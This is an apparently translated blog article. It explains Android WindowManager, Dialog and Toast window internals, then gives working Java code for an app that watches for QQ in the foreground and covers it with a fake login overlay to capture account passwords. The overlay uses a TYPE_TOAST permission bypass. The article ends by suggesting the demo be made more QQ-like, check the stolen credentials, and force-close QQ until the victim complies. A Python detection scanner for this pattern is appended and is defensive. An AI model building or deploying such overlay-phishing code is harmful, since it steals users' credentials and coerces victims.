Analyzing Android WindowManager and the process of phishing a QQ password through a case study


I recently saw someone report a vulnerability online: an application can start a background service that detects the current top application and, if it is QQ or a related application, pops up a custom window to lure the user into entering their account and password. I found this very interesting, so I summarized the relevant knowledge and wrote a demo. The interface is as follows (it is rough and should not fool anyone; it only gets the idea across =, =):

Window && WindowManager Introduction

Before analyzing the demo, let's summarize the relevant background. Start with the Window class. Window is an abstract class located in the frameworks\base\core\java\android\view\Window.java file of the source tree. Including comments, the file is a little over 1000 lines long and outlines the basic properties and features of an Android window. The only implementation of this abstract class is PhoneWindow. Creating a window can only be done through WindowManager; the concrete implementation of windows is located in WindowManagerService, and the interaction between WindowManager and WindowManagerService is an IPC process.

All views in Android are presented through windows. Whether it is an Activity, a Dialog or a Toast, its view is attached to a window, so the window is the direct manager of the view, and click events are also passed to the view by the window.

The WindowManager.LayoutParams.type parameter represents the type of the window. There are three types: application window, child window and system window. An application window corresponds to an Activity. Child windows, such as a Dialog, cannot exist alone and must be attached to an application window. System windows, such as a Toast, do not need a parent and can be displayed directly. Each window has a corresponding z-order, and a window with a higher level covers windows with a lower level. The application window range is 1~99, the child window range is 1000~1999, and the system window range is 2000~2999. These levels correspond to the type values (see the official website links and the Chinese-language materials).

The WindowManager.LayoutParams.flags parameter represents the attributes of the window and defaults to none (see the official links for the flag values). For the other LayoutParams field names and values, refer to the two translated blog posts, WindowManager.LayoutParams (part 1) and WindowManager.LayoutParams (part 2), which are very detailed.

Next, WindowManager. WindowManager is mainly used to manage window state and attributes, view addition, removal and update, window ordering, and message collection and handling. An instance of WindowManager can be obtained with context.getSystemService(Context.WINDOW_SERVICE). The functionality WindowManager provides is simple; only three methods are commonly used, namely adding a view, updating a view and removing a view. These three methods are defined in ViewManager, which WindowManager extends:

addView();
updateViewLayout();
removeView();

These methods modify the window. Their real implementation is the WindowManagerImpl class, but WindowManagerImpl does not implement the three window operations itself; it hands all of them to WindowManagerGlobal. WindowManagerGlobal provides its instance in factory form, with the following code: private final WindowManagerGlobal mGlobal = WindowManagerGlobal.getInstance();. The way WindowManagerImpl works is a typical bridge pattern (not the decorator pattern): all operations are delegated to WindowManagerGlobal.

View is how views are presented in Android, but a view cannot exist alone; it must be attached to the abstract concept of a window. Each window corresponds to one View and one ViewRootImpl, and the window and the view are connected through ViewRootImpl. So wherever there is a view there is a window, as with the common Activity, Dialog and Toast.

Each Activity has only one DecorView, i.e. the ViewRoot. The window is obtained as follows:

    Window mWindow = PolicyManager.makeNewWindow(this);

After the window is created, the Activity sets a callback on it, and the window calls back into the Activity when it receives an external state change. Calling setContentView() in an Activity is actually done by calling Window.setContentView(), and since the concrete implementation of Window is PhoneWindow, the real work happens in PhoneWindow. The PhoneWindow setContentView method works in three steps. The first step checks whether the DecorView exists and, if it does not, calls generateDecor to create one. The second step adds the Activity's view to the DecorView's mContentParent. The third step calls back the Activity's onContentChanged method to notify it that its view has changed. After these steps the DecorView has still not been formally added to the window by WindowManager. Only when makeVisible is called from the Activity's onResume method is the DecorView actually added and displayed, at which point the Activity's view becomes visible to the user.

The Dialog window creation process is similar to that of an Activity. The first step uses PolicyManager.makeNewWindow to create a window, but the context passed in must be an Activity context. The second step sets the dialog's layout view through setContentView. The third step calls the show method, which displays the dialog by having WindowManager add the DecorView to the window.

Toast is different from Dialog and slightly more complex. Toast is also implemented on top of Window, but because a toast is cancelled on a timer, the system uses a Handler. There are two IPC processes inside Toast: the first is Toast accessing NotificationManagerService, and the second is NotificationManagerService calling back the TN interface in Toast. In the Toast class, the show method, the most important method for displaying a toast, calls service.enqueueToast(pkg, tn, mDuration). In other words, the system maintains a toast queue for us, which is why two toasts are never displayed at the same time, and the display duration of a toast enqueued through this method is maintained by the system.

    private static INotificationManager sService;

    static private INotificationManager getService() {
        // Return the cached binder proxy if it has already been looked up
        if (sService != null) {
            return sService;
        }
        sService = INotificationManager.Stub.asInterface(ServiceManager.getService("notification"));
        return sService;
    }

The service sService is the service the system uses to maintain toasts. Finally, NMS calls back via IPC into TN, a private static class inside the Toast class. TN is the primary implementation of the toast and handles creating, showing and hiding the toast view.

QQ Password Phishing Example

With the above foundation, this example is actually very simple.

The first step is to write a service and pop up a custom window from the service:

    windowManager = (WindowManager) getSystemService(Context.WINDOW_SERVICE);
    WindowManager.LayoutParams params = new WindowManager.LayoutParams();
    params.width = WindowManager.LayoutParams.MATCH_PARENT;
    params.height = WindowManager.LayoutParams.MATCH_PARENT;
    params.flags = WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL;
    params.type = WindowManager.LayoutParams.TYPE_TOAST;
    params.format = PixelFormat.TRANSPARENT;
    params.gravity = Gravity.CENTER;
    params.softInputMode = WindowManager.LayoutParams.SOFT_INPUT_ADJUST_PAN;

    LayoutInflater inflater = LayoutInflater.from(this);
    v = (RelativeLayoutWithKeyDetect) inflater.inflate(R.layout.window, null);
    v.setCallback(new RelativeLayoutWithKeyDetect.IKeyCodeBackCallback() {
        @Override
        public void backCallback() {
            // Only remove the view while it is still attached
            if (v != null && v.isAttachedToWindow()) {
                L.e("remove view");
                windowManager.removeViewImmediate(v);
            }
        }
    });

    btn_sure = (Button) v.findViewById(R.id.btn_sure);
    btn_cancel = (Button) v.findViewById(R.id.btn_cancel);
    et_account = (EditText) v.findViewById(R.id.et_account);
    et_pwd = (EditText) v.findViewById(R.id.et_pwd);
    cb_showpwd = (CheckBox) v.findViewById(R.id.cb_showpwd);
    cb_showpwd.setOnCheckedChangeListener(new CompoundButton.OnCheckedChangeListener() {
        @Override
        public void onCheckedChanged(CompoundButton buttonView, boolean isChecked) {
            if (isChecked) {
                et_pwd.setTransformationMethod(HideReturnsTransformationMethod.getInstance());
            } else {
                et_pwd.setTransformationMethod(PasswordTransformationMethod.getInstance());
            }
            et_pwd.setSelection(TextUtils.isEmpty(et_pwd.getText()) ? 0 : et_pwd.getText().length());
        }
    });

    // useless
    // v.setOnKeyListener(new View.OnKeyListener() {
    //     @Override
    //     public boolean onKey(View v, int keyCode, KeyEvent event) {
    //         Log.e("zhao", keyCode + "");
    //         if (keyCode == KeyEvent.KEYCODE_BACK) {
    //             windowManager.removeViewImmediate(v);
    //             return true;
    //         }
    //         return false;
    //     }
    // });

    // click outside to dismiss
    v.setOnTouchListener(new View.OnTouchListener() {
        @Override
        public boolean onTouch(View view, MotionEvent event) {
            Rect temp = new Rect();
            view.getGlobalVisibleRect(temp);
            L.e("remove view");
            if (temp.contains((int) (event.getX()), (int) (event.getY()))) {
                windowManager.removeViewImmediate(v);
                return true;
            }
            return false;
        }
    });
    btn_sure.setOnClickListener(this);
    btn_cancel.setOnClickListener(this);
    L.e("add view");
    windowManager.addView(v, params);

A few points need explaining. First, using TYPE_TOAST instead of TYPE_SYSTEM_ERROR as the window type bypasses the permission requirement; this is the loophole someone described, haha. Second, because the window contains EditText fields, softInputMode needs to be set to SOFT_INPUT_ADJUST_PAN, otherwise the soft keyboard will cover the window. Third, for listening to the back key, setOnKeyListener does not work; in the end the key can only be caught through the View class's dispatchKeyEvent function. Fourth is the click-outside-to-dismiss handling, which the code makes clear.

With the pop-up window in place, the next step is real-time monitoring: start a thread that checks every few seconds whether the application the user is operating is QQ. This is much simpler and can be done with ActivityManager:

    new Thread(new Runnable() {
        @Override
        public void run() {
            while (isRunning) {
                L.e("running");
                try {
                    Thread.sleep(3000);
                } catch (InterruptedException e) {
                    e.printStackTrace();
                }
                ActivityManager activityManager = (ActivityManager)
                        getSystemService(Context.ACTIVITY_SERVICE);
                List<ActivityManager.RunningAppProcessInfo> list =
                        activityManager.getRunningAppProcesses();
                // The first entry is treated as the application in front
                if (list.get(0).processName.equals("com.tencent.mobileqq")) {
                    myHandler.sendEmptyMessage(1);
                }
            }
        }
    }).start();

That is almost everything; finally, start the service from an Activity. Of course, there is plenty of room for improvement:

1. Modify the UI to make it more similar to the QQ style.

2. After the user enters the account and password, addView a loading dialog, then call the relevant interface to verify that the username and password are correct, and if they are not, prompt the user to enter them again.

3. If the user does not enter the account and password, directly call the killBackgroundProcesses function (needs permission) to force-close QQ until the user enters the account and password.
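When triaging an APK, the combination this article relies on (a TYPE_TOAST window, polling for the foreground process, a hard-coded package comparison and a password field) can be flagged in decompiled source. The following is an added example, not code from the original article; the indicator set, the function names `scan` and `verdict`, and the sample excerpts are assumptions constructed for illustration.

```python
import re
# Heuristic indicators taken from the behaviour this article describes.
INDICATORS = {
    "overlay_type": re.compile(r"\bTYPE_(TOAST|SYSTEM_ERROR|SYSTEM_ALERT|PHONE)\b"),
    "fg_polling": re.compile(r"\bgetRunning(AppProcesses|Tasks)\s*\("),
    "pkg_compare": re.compile(r'\.equals\s*\(\s*"([a-z]\w*(?:\.\w+)+)"\s*\)'),
    "password_ui": re.compile(r"\bPasswordTransformationMethod\b"),
    "kill_other_app": re.compile(r"\bkillBackgroundProcesses\s*\("),
}

def scan(sources):
    """Return {indicator: [(file, line number, matched text), ...]}."""
    hits = {name: [] for name in INDICATORS}
    for path, text in sources.items():
        for lineno, line in enumerate(text.splitlines(), 1):
            if line.lstrip().startswith("//"):
                continue  # commented-out code is not behaviour
            for name, rx in INDICATORS.items():
                for m in rx.finditer(line):
                    hits[name].append((path, lineno, m.group(0)))
    return hits

def verdict(hits):
    """Escalate only on the combination, since each indicator alone is common."""
    overlay = bool(hits["overlay_type"])
    watching = bool(hits["fg_polling"] and hits["pkg_compare"])
    lure = bool(hits["password_ui"] or hits["kill_other_app"])
    if overlay and watching:
        return "overlay-phishing pattern" if lure else "overlay keyed to foreground app"
    return "no pattern"

# Constructed sample input: excerpts shaped like decompiled app source.
SUSPICIOUS = {
    "OverlayService.java": """
params.type = WindowManager.LayoutParams.TYPE_TOAST;
et_pwd.setTransformationMethod(PasswordTransformationMethod.getInstance());
""",
    "Watcher.java": """
list = activityManager.getRunningAppProcesses();
if (list.get(0).processName.equals("com.tencent.mobileqq")) {
""",
}
BENIGN = {
    "LoginActivity.java": """
// params.type = WindowManager.LayoutParams.TYPE_TOAST;
passwordField.setTransformationMethod(PasswordTransformationMethod.getInstance());
if (action.equals("com.example.LOGIN")) { submit(); }
""",
}
```

The file and line tuples returned by `scan` point the reviewer at the code to read by hand; the verdict is a triage hint, not proof of malicious intent.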

The above analyzes Android WindowManager and the process of phishing a QQ password through a case study. I hope this article is helpful to everyone.
